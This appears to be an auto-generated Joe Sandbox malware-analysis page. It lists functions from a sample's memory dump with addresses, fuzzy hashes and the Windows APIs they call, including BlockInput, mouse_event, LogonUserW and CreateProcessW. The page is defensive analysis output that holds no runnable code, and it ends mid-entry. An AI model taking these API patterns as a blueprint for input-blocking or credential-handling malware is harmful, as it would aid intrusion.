Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 8dddf030e73d2b7476fc70d2f94457ce44095bf9b97f4f2be6656460834cdbef
Instruction ID: 98c70b0c6562584fbacd72f37f9fa274b75b25747bca027d7229cb39b7459dd1
Opcode Fuzzy Hash: 8dddf030e73d2b7476fc70d2f94457ce44095bf9b97f4f2be6656460834cdbef
Instruction Fuzzy Hash: B501F132A00119ABDB149E28D809BFB3B92EF41364F148137F909172B3C7386C24A7A8

Function 0047E769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0042B155: GetWindowLongW.USER32(?,000000EB), ref: 0042B166

CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0047E7AF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$CallLongProc
String ID:
API String ID: 4084987330-0
Opcode ID: 88c6550405b8a9b2a486d84c6f05f7ac60972bf0fc06e562c90a899c2b1905ae
Instruction ID: 8e4c527bd9f1b02d53350a8e8d9fc227dc51fe9efe70c74505bde8a6c5179353
Opcode Fuzzy Hash: 88c6550405b8a9b2a486d84c6f05f7ac60972bf0fc06e562c90a899c2b1905ae
Instruction Fuzzy Hash: 11F03131100108BFCF09EF55EC508BA3BAAEB08360B408566FD154A2B1C7369D71EB59

Function 0047EA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

Part of subcall function 0042B736: GetCursorPos.USER32(000000FF), ref: 0042B749
Part of subcall function 0042B736: ScreenToClient.USER32(00000000,000000FF), ref: 0042B766
Part of subcall function 0042B736: GetAsyncKeyState.USER32(00000001), ref: 0042B78B
Part of subcall function 0042B736: GetAsyncKeyState.USER32(00000002), ref: 0042B799

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0048F417,?,?,?,?,?,00000001,?), ref: 0047EA9C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: 0764c6ab91eff31d545400fab8d5c7cd742077158101145e96ba7fbb0921d7b7
Instruction ID: f44d44a9e689721bdbebe9c8331f3fb190347b096770b7abb73e92068d84e242
Opcode Fuzzy Hash: 0764c6ab91eff31d545400fab8d5c7cd742077158101145e96ba7fbb0921d7b7
Instruction Fuzzy Hash: 0CF0A731200229BBDB14AF5ADC05EBA3F65FB04794F404067FD0A1A1A1D77A9871EBD9

Function 0042B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0042AF40,?,?,?,?,?), ref: 0042B83B

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: f98f650578c91782a8e0c2909d9d1a683dc921275ef50580e532c8430b9b505a
Instruction ID: ff51f40b0cbc1cd67dcf341893b902c6abea14186c4e88cf8fc15f81c2b4e7c0
Opcode Fuzzy Hash: f98f650578c91782a8e0c2909d9d1a683dc921275ef50580e532c8430b9b505a
Instruction Fuzzy Hash: 4BF05E30600219AFDB18EF55DC9093A3BA6FB15360F50822BFD528B3B0D775D860EB98

Function 0046703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00467057

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 19674342dfdf3aeebfa2ab37a29a245e4176c870297b267d8d7d000fff625bcb
Instruction ID: eff5923a186d5ddb84c9e298151aaff330e0891d0f592fc95f473a3b096e8fe0
Opcode Fuzzy Hash: 19674342dfdf3aeebfa2ab37a29a245e4176c870297b267d8d7d000fff625bcb
Instruction Fuzzy Hash: A5E012352042146FD7109B69D904A96B7EC9F55754F00C42BA945D7251EAB4EC408BA5

Function 0047F3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0047F41A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 56f3cabde8bbb74ad424740787f0775bdbe75560a7ef1a80dd678e714f1be9f6
Instruction ID: 96e7670c525931e65f617061a898ea662f2d4e1c851154e7a4d60d6ffd0328aa
Opcode Fuzzy Hash: 56f3cabde8bbb74ad424740787f0775bdbe75560a7ef1a80dd678e714f1be9f6
Instruction Fuzzy Hash: 95F06D31241289BFDB21EF58DC09FC63B95FB15360F04846ABA15672E1CB746820E768

Function 00457DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00457DF8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 6699df8e5139b49e10f1d437556999428d5ca227efac870722d3521b94f75a6b
Instruction ID: 758ee3f565f35d36915172efc0fe9b84ca6ce3a6a8890e7a27f1e8e967e74b59
Opcode Fuzzy Hash: 6699df8e5139b49e10f1d437556999428d5ca227efac870722d3521b94f75a6b
Instruction Fuzzy Hash: 9BD017A016C20A79EA180B20BC2FFBB2129EB40782FA0426BBC01861C3E898680D502D

Function 0047F425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0048F3D4,?,?,?,?,?,?), ref: 0047F450

Part of subcall function 0047E13E: _memset.LIBCMT ref: 0047E14D
Part of subcall function 0047E13E: _memset.LIBCMT ref: 0047E15C
Part of subcall function 0047E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004D3EE0,004D3F24), ref: 0047E18B
Part of subcall function 0047E13E: CloseHandle.KERNEL32 ref: 0047E19D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: f765a32bf02ffa89e562b97f3faf83b2779faf42519b126e6db22573686cfafa
Instruction ID: 9a4bab09839b3d99a502049e3d2492068d5d41dc7b2015d13c25afdc1f90fb75
Opcode Fuzzy Hash: f765a32bf02ffa89e562b97f3faf83b2779faf42519b126e6db22573686cfafa
Instruction Fuzzy Hash: 13E04631100208EFCB01EF49DC05E9637A2FB18354F018066FA08572B1C731A821EF49

Function 0042AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0042ACC7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 5160e027c11ff1e441942a48aa19ec046c8b39f8a12df8972169783b1338ad1b
Instruction ID: b38eed2bf5f457c0227469a80803b35d38ade5bcf52a4d802ca4ad742a8e4bbc
Opcode Fuzzy Hash: 5160e027c11ff1e441942a48aa19ec046c8b39f8a12df8972169783b1338ad1b
Instruction Fuzzy Hash: 53E0EC35600208FBCF05AF91DC51E643B26FB49394F50846AFA054A2B1CB36A522EB59

Function 0044BE95 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0044BA6A), ref: 0044BEB3

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 2e8d684111a98fbffc118d664d9c804699f6a992a48de6ed58b269be1305057c
Instruction ID: eab06996a5c9ab866afa23f889e372b04fa66c4c4805c79d949e9b65214d046e
Opcode Fuzzy Hash: 2e8d684111a98fbffc118d664d9c804699f6a992a48de6ed58b269be1305057c
Instruction Fuzzy Hash: 21D05E320A460EAEDF024FA4DC02EAE3F6AEB04700F408121FA11D50A0C671D531AB50

Function 0047F37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0047F3A1

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 59fe18342c082fc8469d933a221bdad017eda209d5856ecedc26239b611ad264
Instruction ID: 803386efd7921c4db808fabbc3a591fa9d24cba5ea5bd23ff7bf8d724162954a
Opcode Fuzzy Hash: 59fe18342c082fc8469d933a221bdad017eda209d5856ecedc26239b611ad264
Instruction Fuzzy Hash: 60E0E23420424CEFCB01EF88DC44E863BA5FB2A350F010065FD048B261C771A820EB61

Function 0047F3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0047F3D0

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 2f77bb048238ea6f49f2d791ac96dc9ef0044bd1e0ff98b693100ed4784008de
Instruction ID: ec1b7848ea5bc8e8ec5514245f5a6f217ddafb03ff28797200d28653fde76253
Opcode Fuzzy Hash: 2f77bb048238ea6f49f2d791ac96dc9ef0044bd1e0ff98b693100ed4784008de
Instruction Fuzzy Hash: 9DE0E23420024CEFCB01EF88D844E863BA5FB1A350F010065FD048B262C772A820EBA1

Function 0042B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

Part of subcall function 0042B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0042B85B), ref: 0042B926
Part of subcall function 0042B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0042B85B,00000000,?,?,0042AF1E,?,?), ref: 0042B9BD

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0042AF1E,?,?), ref: 0042B864

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: bfc432427adb68c8ce18ed9438947da02cfbb2a63b2e2f02d3d04376e8e84289
Instruction ID: ed006e86fe313440001aefd907945370090c0e471c94ad2bf7b4795aff51075d
Opcode Fuzzy Hash: bfc432427adb68c8ce18ed9438947da02cfbb2a63b2e2f02d3d04376e8e84289
Instruction Fuzzy Hash: 08D0127224430C77DB107BA2ED07F493A1DEB10794F808437FA05691E18B79A460A59D

Function 00438E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00438E1F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d1ce7af231a7bb32278f52aa5f69aed9ff2518a2814ad6977a6ef76e3bfbcce5
Instruction ID: 52baa68d74b37a8c9811b1286112fa633499a4cf4d2de25d1cc0464befc52d71
Opcode Fuzzy Hash: d1ce7af231a7bb32278f52aa5f69aed9ff2518a2814ad6977a6ef76e3bfbcce5
Instruction Fuzzy Hash: 01A0243000050CF7CF001F71FC044447F5CD7441517004031FC0C00031C733541045C5

Function 00430EC4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 3aaaa44dae38237b8548a3cce408a275de953c1d61999ca329a6a4dcd243217a
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 8BC1E5722051A349DF2D463AC43043FBEA15AB67B271A27AFD4B3CB6D0EE28C524D614

Function 004312F9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 6a8fc942651002d8832de4bb93d3861c5770b6bcb84abe86ce6625e13b39dabc
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: C9C1F9722051A34ADF2D4639C43443FBEA15BB67B271A276FD8B3CB6D0EE28C524D524

Function 00430A8F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 7005c9987d07be5160433aabe4a9b3fc9848f26c58aa6905e011df90b2b10ae7
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: FBC1D4722051A349DF2D4639843443FFEA05AB67B6B1A276FD4B3CB6C0EE2CD524D624

Function 00430677 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
